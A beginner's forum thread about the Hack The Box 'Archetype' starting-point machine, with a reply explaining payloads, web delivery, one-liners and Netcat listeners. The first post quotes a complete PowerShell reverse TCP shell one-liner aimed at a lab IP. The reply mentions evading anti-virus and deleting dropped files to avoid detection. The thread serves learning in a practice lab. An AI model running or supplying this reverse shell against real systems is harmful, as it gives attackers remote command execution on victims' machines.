ARCHETYPE

Hello,

I have a few years of some pretty basic IT background, and I’m finding myself already in over my head with just these starting points.

I have a question for those that find these beginner boxes easy.

How do you go about teaching yourself as you might flail through these boxes? Do you stop and get extremely familiar with concepts you don’t understand?

For me, I’ve been trying to do that and I will end up spending days trying to teach myself something. And it usually works. But then I find others that are just kind of winging it, moving through the boxes with ease but not necessarily understanding everything that is happening.

Here is an example…

The very first box ARCHETYPE wanted you to create a reverse shell, while i understand the basic concept of it, I feel we will be expected to create our own reverse shells from scratch without any pointers in the future.

$client = New-Object System.Net.Sockets.TCPClient(“10.10.14.3”,443);$stream = $client.GetStream();[byte]$bytes = 0…65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

This one for example. I only understand a fraction of what is happening. Like setting variables in powershell and establishing what IP to make a connection to, but I would be lieing if said that I understand everything that is happening.

My experience with callbacks, reverse shells, whatever you’d like to call it is the simple SSH reverse tunnels. Those are easy. The syntax is simple. But the text above? Way over my head.

Any advice for a noob?

Hey. Same situation here—total beginner. I had never seen the PowerShell command before, and had no idea what it meant.

Starting Point is a pretty rough spot for learning I think, because the walkthroughs don’t teach the meaning or method behind what you’re doing.

What I’ve started doing instead is read write-ups and watch videos for retired machines, and try to solve those. People use the same tools, and that helps learn the most common syntax. Also, people solve each box with different tools, and that helps to understand the theory behind the solutions. Don’t worry about “spoiling” the boxes. By the time you go back and try it on your own, you’ll have forgotten stuff and need to use trial and error or looks stuff up again. But you might have more fun as you learn this way.

Some things I learned about Archetype this way:

1. The walkthrough has you create a file with code “$client = New-Object…”. This is a “reverse TCP shell payload” for Windows x64. Reading write-ups you’ll see that some people don’t code the payload themselves—they use a tool to generate it. You’ll also see some people generate a reverse HTTP or reverse HTTPS payload instead. You’ll see that payloads have a file format (e.g. PowerShell) and need to match the target OS (e.g. Windows) and architecture (e.g. 64-bit) or they might not execute once you get them onto the machine.

2. The walkthrough has you set up a HTTP server to provide the payload to the machine. This is a “delivery method”. The goal is to get the payload onto the machine in any way that works, and a web delivery method is one common way of doing it. Other people might try to upload the file directly to the box using an available service and execute it somehow. A fun exercise might be to try getting the file onto Archetype somehow, and note why this does or doesn’t work.

3. The PowerShell IEX command is an example of what’s sometimes called a “one-liner”. This is one way of using web delivery to download a payload to a machine and execute it in one go. Reading write-ups, you’ll see several people using this same syntax, so it’s a common one. Other people use a tool that generates the payload and then provides the command on-screen, so they can copy and paste it rather than just know it by heart. Some tools provide them with a PowerShell command that does the same thing but looks completely different to avoid anti-virus. Other people might try to just download the payload from your HTTP server onto the machine using a different command, and then execute it somehow. That would do the same thing, but it would leave a file on the hard drive that needs to be deleted afterwards to avoid detection.

In write-ups for linux boxes, you’ll see people generate a reverse shell payload file, use web delivery and a one-liner to download and execute it. The file will be different, and the one-liner has a different syntax, but they’re really doing the same thing as in Archetype.

4. The walkthrough has you start up Netcat to receive the reverse shell once the machine downloads and executes your payload. This is called a “listener”. Reading write-ups, you’ll see people using different tools as a listener. Some of them will use Netcat as a fallback when other tools fail—it appears to be the “rolling your own”-option.

5. The walkthrough has you using a script from a particular package to connect to MSSQL. Reading write-ups, you’ll see that the package is a popular choice—it has an MSSQL client script and lots of other ones. Other people will use different tools to connect to and poke around in the server.